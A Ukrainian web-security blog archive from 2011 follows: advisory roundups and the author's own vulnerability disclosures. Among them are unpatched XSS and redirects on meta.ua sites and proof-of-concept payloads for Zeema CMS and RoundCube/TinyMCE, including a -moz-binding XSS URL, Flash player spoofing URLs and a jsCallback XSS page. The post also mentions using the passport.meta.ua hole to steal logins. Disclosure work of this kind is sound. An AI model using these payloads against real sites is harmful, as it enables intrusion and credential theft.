Архів для категорії 'Уразливості'

Добірка уразливостей

17:03 06.12.2011

В даній добірці уразливості в веб додатках:

Уразливості на zakon.meta.ua

23:56 03.12.2011

У січні, 26.01.2008, я знайшов Cross-Site Scripting та Redirector уразливості на сайті http://zakon.meta.ua. Як я вже розповідав, після останнього разу, коли вони відповіли мені дуже несерйозним чином, я більше не сповіщаю Мету про дірки на їхніх сайтах.

Останнього разу стосовно проектів компанії Мета я писав про уразливість на passport.meta.ua.

XSS:

XSS (Strictly social XSS):

Redirector (URL Redirector Abuse):

http://zakon.meta.ua/law.asp?url=http://websecurity.com.ua

Про цей редиректор я вже писав в 2008 році.

Дані уразливості так досі й висять на сайті, як це було до того, як я знайшов їх у січні 2008 року (тобто на протязі всього часу роботи цього сайта). І це є типовим явищем для сайтів Мети, що добре видно з тих багатьох дірок на багатьох сайтах Мети про які я розповідав раніше.

Добірка уразливостей

17:29 03.12.2011

В даній добірці уразливості в веб додатках:

  • VMware vCenter Update Manager fix for Jetty Web server addresses directory traversal vulnerability (деталі)
  • XSS vulnerability in TWiki < 5.0.2 (деталі)
  • PHPCaptcha / Securimage 2.0.2 - Authentication Bypass (деталі)
  • Apache Struts 2, XWork, OpenSymphony WebWork Java Class Path Information Disclosure (деталі)
  • Session hacking via authentication cookie on Oracle CRM on Demand (деталі)
  • libmojolicious-perl security update (деталі)
  • 2WIRE-SINGTEL 2701HGV-E/2700HGV-2/2700HG GATEWAY ROUTER MANAGEMENT AND DIAGNOSTIC CONSOLE VULNERABILITY (деталі)
  • SQL injection in ExtCalendar 2 (деталі)
  • Multiple XSS in phpScheduleIt (деталі)
  • APPLE-SA-2011-11-10-1 iOS 5.0.1 Software Update (Apple iPhone) (деталі)

Уразливість на passport.meta.ua

23:53 02.12.2011

Ще у лиспопаді, 01.11.2006, я знайшов Cross-Site Scripting уразливість на сайті http://passport.meta.ua. Як я вже розповідав, після останнього разу, коли вони відповіли мені дуже несерйозним чином, я більше не сповіщаю Мету про дірки на їхніх сайтах.

Останнього разу стосовно проектів компанії Мета я писав про уразливості на tv.meta.ua.

XSS:

Дану уразливість вони вже виправили, одразу після моїх численних повідомлень про дірки на їхніх сайтах, як я вияснив ще в 2007 році (коли дійшов час до її оприлюднення). Але виправили вони неякісно, тому уразливість знову працює, при невеликій зміні коду.

XSS (з MouseOverJacking):

Дана уразливість так досі й висить на сайті, як це було до того, як я знайшов її у листопаді 2006 року (тобто на протязі всього часу роботи цього сайта). І це є типовим явищем для сайтів Мети, що добре видно з тих багатьох дірок на багатьох сайтах Мети про які я розповідав раніше.

Враховуючи, що уразливість на домені passport.meta.ua, де користувачі логіняться в свої акаунти, то її також можна використати для викрадання логінів та паролів користувачів даного портала. Що можна зробити як шляхом фішинга (включаючи on-site фішинг), так і шляхом XSS атаки на менеджери паролів в браузерах.

Уразливості в Zeema CMS

17:27 02.12.2011

22.10.2011

У вересні, 12.09.2011, під час аудиту сайта свого клієнта, я знайшов Brute Force, Cross-Site Scripting та Full path disclosure уразливості в Zeema CMS (це українська комерційна CMS). Про що найближчим часом повідомлю розробникам.

Це частина з великої кількості уразливостей знайдених в даній CMS. Про інші дірки я розповім згодом. Всім користувачам даної системи вельми рекомендується провести аудит безпеки власних сайтів.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам веб системи.

02.12.2011

Brute Force:

http://site/cms/

XSS:

http://site/search/?query=%22%20style=%22-moz-binding:url(http://websecurity.com.ua/webtools/xss.xml%23xss)

Атака спрацює в браузерах Mozilla і Firefox.

Full path disclosure:

http://site/search/?page=10&query=site

Уразливі всі версії Zeema CMS.

Добірка уразливостей

17:29 01.12.2011

В даній добірці уразливості в веб додатках:

  • EMC Documentum eRoom arbitrary file upload vulnerability (деталі)
  • sNews 1.7.1 XSS vulnerability (деталі)
  • XSRF (CSRF) in Argyle Social (деталі)
  • Microsoft Security Bulletin MS10-051 - Critical Vulnerability in Microsoft XML Core Services Could Allow Remote Code Execution (деталі)
  • Multiple XSS (Cross Site Scripting) vulnerabilities in Argyle Social (деталі)
  • XSRF (CSRF) in Open Classifieds (деталі)
  • EMC SourceOne ASP.NET application tracing information disclosure vulnerability (деталі)
  • Multiple XSS flaws within Mitel’s AWC (Mitel Audio and Web Conferencing) (деталі)
  • Multiple XSS (Cross Site Scripting) vulnerabilities in PHP Calendar Basic (деталі)
  • Zeacom Chat Server JSESSIONID weak SessionID Vulnerability (деталі)

Численні уразливості в RoundCube

17:20 30.11.2011

18.10.2011

В жовтні, 12.10.2011, а також додатково 15.10.2011, я знайшов численні уразливості в RoundCube. Це Brute Force, Content Spoofing, Cross-Site Scripting та Clickjacking уразливості. Частина з цих дірок - це уразливості в TinyMCE, що постачається з RoundCube. Про що найближчим часом повідомлю розробникам.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам веб додатку.

30.11.2011

Brute Force:

http://site/index.php

Content Spoofing:

Можна вказувати абсолютні URL для включення зовнішніх файлів в флешку на цільовому сайті.

http://site/program/js/tiny_mce/plugins/media/img/flv_player.swf?flvToPlay=http://site2/1.flv
http://site/program/js/tiny_mce/plugins/media/img/flv_player.swf?autoStart=false&startImage=http://site2/1.jpg
http://site/program/js/tiny_mce/plugins/media/img/flv_player.swf?flvToPlay=http://site2/1.flv&autoStart=false&startImage=http://site2/1.jpg
http://site/program/js/tiny_mce/plugins/media/img/flv_player.swf?flvToPlay=http://site2/1.xml

Через xml-файл, розміщений на поточному чи зовнішньому ресурсі, можна вказувати абсолютні URL для включення зовнішніх файлів в флешку на цільовому сайті (параметри thumbnail та url в xml-файлі приймають довільні адреси).

Файл 1.xml:

<?xml version="1.0" encoding="UTF-8"?>
<playlist>
	<item name="Content Spoofing" thumbnail="1.jpg" url="1.flv"/>
	<item name="Content Spoofing" thumbnail="2.jpg" url="2.flv"/>
</playlist>

XSS:

<html>
<body>
<script>
function flvStart() {
	alert('XSS');
}
function flvEnd() {
	alert('XSS');
}
</script>
<object width="50%" height="50%">
<param name=movie value="flv_player.swf?flvToPlay=1.flv&jsCallback=true">
<param name=quality value=high>
<embed src="flv_player.swf?flvToPlay=1.flv&jsCallback=true" width="50%" height="50%" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash"></embed>
</object>
</body>
</html>

Якщо на сайті на сторінці з flv_player.swf (з параметром jsCallback=true, або якщо є можливість вказати цей параметр для flv_player.swf) є можливість включити JS код з функцією flvStart() і/або flvEnd() (через HTML Injection), то можна провести XSS атаку. Тобто JS-калбеки можна використати для XSS атаки.

Content Spoofing:

http://site/program/js/tiny_mce/plugins/media/moxieplayer.swf?url=http://site2/1.flv

Можна вказувати абсолютні URL для включення зовнішніх файлів в флешку на цільовому сайті.

Clickjacking:

RoundCube вразливий до віддаленого логіну з використанням Clickjacking. Про дані атаки я вже розповідав в своїй статті.

В версії RoundCube 0.6-RC доданий захист от Clickjacking атак (окрім вищезгаданої форми логіну), до якого вразливий весь функціонал додатку. Але захист недостатньо ефективний, так як спрацьовує лише в нових версіях деяких браузерів, тому користувачі старих браузерів будуть незищені. Ну, а старі версії RoundCube повністю вразливі до Clickjacking.

CS та XSS - це уразливості в TinyMCE.

Уразливі RoundCube 0.6 та попередні версії (перевірялося в 0.4-beta та 0.6). В останній версії RoundCube 0.6 використовує moxieplayer.swf (замість flv_player.swf). Як повідомили мені розробники, в версії RoundCube 0.7 уразливості будуть виправлені.

Уразливості в плагінах для WordPress №53

23:56 29.11.2011

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Zingiri Web Shop, Lanoba Social та advanced-text-widget. Для котрих з’явилися експлоіти. Zingiri Web Shop - це плагін для створення онлайн магазина, Lanoba Social - це плагін для інтеграції з соціальними мережами (такими як Facebook, Twitter та іншими), advanced-text-widget - це текстовий віджет з розширеними можливостями для розміщення контенту.

  • Wordpress Zingiri Web Shop Plugin <= 2.2.3 Remote Code Execution Vulnerability (деталі)
  • wordpress Lanoba Social Plugin Xss Vulnerabilities (деталі)
  • Wordpress advanced-text-widget Plugin Vulnerabilities (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Добірка уразливостей

17:20 26.11.2011

В даній добірці уразливості в веб додатках:

  • Cisco Small Business SRP500 Series Command Injection Vulnerability (деталі)
  • Apache Struts 2 Multiple Reflected XSS in XWork error pages (деталі)
  • XSRF (CSRF) in Webmatic (деталі)
  • HP TCP/IP Services for OpenVMS Running POP or IMAP, Remote Unauthorized Access (деталі)
  • Various XSS and information disclosure flaws within KeyFax response management system (деталі)
  • HP TCP/IP Services for OpenVMS Running SMTP Server, Remote Denial of Service (DoS) (деталі)
  • Civica Spydus Library Management System (LMS) - Cross-Site Scripting Vulnerability (деталі)
  • SQL injection in Calendarix (деталі)
  • HP OpenView Network Node Manager (OV NNM), Remote Execution of Arbitrary Code (деталі)
  • Multiple XSS in Calendarix (деталі)

Уразливість на tv.meta.ua

23:51 25.11.2011

У червні, 01.06.2007, як раз коли я розпочав свій проект Місяць багів в Пошукових Системах (де я і про Мету згадував), я знайшов Cross-Site Scripting уразливість на сайті http://tv.meta.ua. Як я вже розповідав, після останнього разу, коли вони відповіли мені дуже несерйозним чином, я більше не сповіщаю Мету про дірки на їхніх сайтах.

Останнього разу стосовно проектів компанії Мета я писав про уразливості на meta.ua та auction.meta.ua.

XSS:

Дана уразливість так досі й висить на сайті, як це було до того, як я знайшов її у червні 2007 року (тобто на протязі всього часу роботи цього сайта). І це є типовим явищем для сайтів Мети, що добре видно з тих багатьох дірок на багатьох сайтах Мети про які я написав раніше і про які ще напишу.